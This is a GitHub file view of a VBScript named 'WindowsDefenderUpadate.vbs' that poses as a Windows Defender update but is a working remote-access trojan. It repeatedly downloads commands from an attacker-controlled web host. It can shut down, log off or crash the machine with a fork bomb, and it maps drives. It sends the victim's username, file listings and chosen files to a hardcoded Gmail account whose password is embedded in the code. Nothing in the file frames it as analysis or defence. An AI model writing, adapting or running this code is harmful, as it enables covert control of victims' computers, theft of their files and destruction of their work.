-
Notifications
You must be signed in to change notification settings - Fork 0
/
WindowsDefenderUpadate.vbs
246 lines (230 loc) · 7.48 KB
/
WindowsDefenderUpadate.vbs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
Option Explicit
On Error Resume Next
Call ClearTrash()
dim status
status=True
Do While status=True
Dim fso,fso1,oFile,Instruction,URL,tagIn,tagOut,UName,stat
stat=1
URL="https://dedsec101.000webhostapp.com/home/File.txt"
Call HTTPDownload(URL,(Left(WScript.ScriptFullName,(Len(WScript.ScriptFullName)-Len(WScript.ScriptName)))))
Set fso=CreateObject("Scripting.FileSystemObject")
Set fso1=CreateObject("Scripting.FileSystemObject")
Set Instruction=fso1.OpenTextFile("File.txt",1,False)
If Not(fso.FileExists("Log.txt")) Then
fso.CreateTextFile("Log.txt")
End If
Set oFile=fso.OpenTextFile("Log.txt",1,False)
tagIn=Split(Instruction.ReadLine(),"#")
Instruction.Close
Call getUName()
If (tagIn(1)=UName Or tagIn(1)="ALL") Then
If Not(oFile.AtEndOfLine) Then
tagOut=Split(oFile.ReadLine,"#")
If Not(tagIn(2)=tagOut(2)) Then
oFile.Close
Set oFile=fso.OpenTextFile("Log.txt",2,False)
oFile.WriteLine(tagIn(0)&"#"&tagIn(1)&"#"&tagIn(2))
oFile.Close
Call fetch()
Else
MsgBox "DO Nothing"
End If
Else
oFile.Close
Set oFile=fso.OpenTextFile("Log.txt",2,False)
oFile.WriteLine(tagIn(0)&"#"&tagIn(1)&"#"&tagIn(2))
oFile.Close
Call fetch()
End If
End If
fso.DeleteFile "File.txt",True
WScript.Sleep 30000
Loop
Function HTTPDownload( myURL, myPath )
Dim i, objFile, objFSO, objHTTP, strFile, strMsg
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Set objFSO = CreateObject( "Scripting.FileSystemObject" )
If objFSO.FolderExists( myPath ) Then
strFile = objFSO.BuildPath( myPath, Mid( myURL, InStrRev( myURL, "/" ) + 1 ) )
ElseIf objFSO.FolderExists( Left( myPath, InStrRev( myPath, "\" ) - 1 ) ) Then
strFile = myPath
Else
Exit Function
End If
Set objFile = objFSO.OpenTextFile( strFile, ForWriting, True )
Set objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" )
objHTTP.Open "GET", myURL, False
objHTTP.Send
For i = 1 To LenB( objHTTP.ResponseBody )
objFile.Write Chr( AscB( MidB( objHTTP.ResponseBody, i, 1 ) ) )
Next
objFile.Close( )
End Function
Function fetch()
Dim line,command
Set fso1=CreateObject("Scripting.FileSystemObject")
Set Instruction=fso1.OpenTextFile("File.txt",1,False)
Instruction.ReadLine()
Do While Not(Instruction.AtEndOfStream)
line=Instruction.ReadLine
command=Split(line,"#")
Call decode(command(0),command(1))
Loop
Instruction.Close
End Function
Function decode(name,value)
If(name="SEND") Then
Call Send(value)
ElseIf(name="SHUTDOWN") Then
Call ExecuteShutdown(value)
ElseIf(name="LOGOFF") Then
Call ExecuteLogoff(value)
ElseIf(name="CRASHSYSTEM") Then
Call CrashSystem(value)
ElseIf(name="GETUSERNAME") Then
Call getUName()
Call getTransport(UName)
ElseIf(name="MAPDIR") Then
Call mapDir(value)
ElseIf(name="GETFILES") Then
Call getFiles(value)
End If
End Function
Function send(value)
MsgBox value,vbOKOnly+vbSystemModal,"SCADA 1337"
End Function
Function ExecuteShutdown(value)
Dim wsh
Set wsh = CreateObject("Wscript.Shell")
wsh.Run ("cmd /c shutdown.exe -s -t "&value),0,True
End Function
Function ExecuteLogoff(value)
Dim wsh
Set wsh = CreateObject("Wscript.Shell")
wsh.Run "cmd /c shutdown.exe /l ",0,True
End Function
Function getUName()
Dim ws,DeskDir,chunks
Set ws = CreateObject("Wscript.shell")
DeskDir = ws.SpecialFolders("Desktop")
chunks = Split(DeskDir,"\")
UName=chunks(2)
End Function
Function CrashSystem(value)
Dim wsh,fso,oFile
Set wsh=CreateObject("Wscript.shell")
Set fso=CreateObject("Scripting.FileSystemObject")
fso.CreateTextFile "crash.bat"
Set oFile = fso.OpenTextFile("crash.bat",2,True)
oFile.WriteLine("@echo Off")
oFile.WriteLine(":A")
oFile.WriteLine("start")
oFile.WriteLine("goto A")
oFile.Close
wsh.Run "crash.bat",0,True
End Function
Function ClearTrash()
Dim fso
Set fso=CreateObject("Scripting.FileSystemObject")
If fso.FileExists("crash.bat") Then
fso.DeleteFile "crash.bat"
ElseIf fso.FileExists("File.txt") Then
fso.DeleteFile "File.txt"
End If
End Function
Function getTransport(value)
Dim objMessage, Email, EPass
Email = "[email protected]"
EPass = "sleepercell"
Set objMessage = CreateObject("CDO.Message")
objMessage.Subject =UName
objMessage.From = Email
objMessage.To = Email
objMessage.TextBody = value
objMessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
objMessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.gmail.com"
objMessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
objMessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/sendusername") = Email
objMessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/sendpassword") = EPass
objMessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = "465"
objMessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = True
objMessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/smtpconnectiontimeout") = 60
objMessage.Configuration.Fields.Update
objMessage.Send
End Function
Function Destruct()
fso.DeleteFolder("C:\Intel\0ld Window")
End Function
Function mapDir(value)
Dim fso,map,Path,file
Path=value&":\"
map=""
Set fso=CreateObject("Scripting.FileSystemObject")
If fso.DriveExists(value) Then
For Each file In fso.GetFolder(Path).Files
map=map&file&vbLf
Next
Call Burrial(fso.GetFolder(Path),map)
Call getTransport(map)
Else
Call getTransport("Drive not Found")
End If
End Function
Function Burrial(folder,map)
Dim subfolder,file
If ((fso.GetFolder(folder).Attributes<>22 And fso.GetFolder(folder).Attributes<>1046) Or stat=1) Then
For Each subfolder In fso.GetFolder(folder).SubFolders
If ((fso.GetFolder(subfolder).Attributes<>22 And fso.GetFolder(folder).Attributes<>1046)) Then
For Each file In fso.GetFolder(subfolder).Files
map=map&file&vbLf
Next
End If
stat=0
Call Burrial(subfolder,map)
Next
End If
End Function
Function getFiles(value)
Dim objMessage, Email, EPass ,path,count
Call getUName()
Email = "[email protected]"
EPass = "sleepercell"
Set objMessage = CreateObject("CDO.Message")
objMessage.Subject =UName
objMessage.From = Email
objMessage.To = Email
objMessage.TextBody = UName
path=Split(value,"::")
count=0
Do While(count<=UBound(path))
objMessage.AddAttachment path(count)
count=count+1
Loop
objMessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
objMessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.gmail.com"
objMessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
objMessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/sendusername") = Email
objMessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/sendpassword") = EPass
objMessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = "465"
objMessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = True
objMessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/smtpconnectiontimeout") = 60
objMessage.Configuration.Fields.Update
objMessage.Send
End Function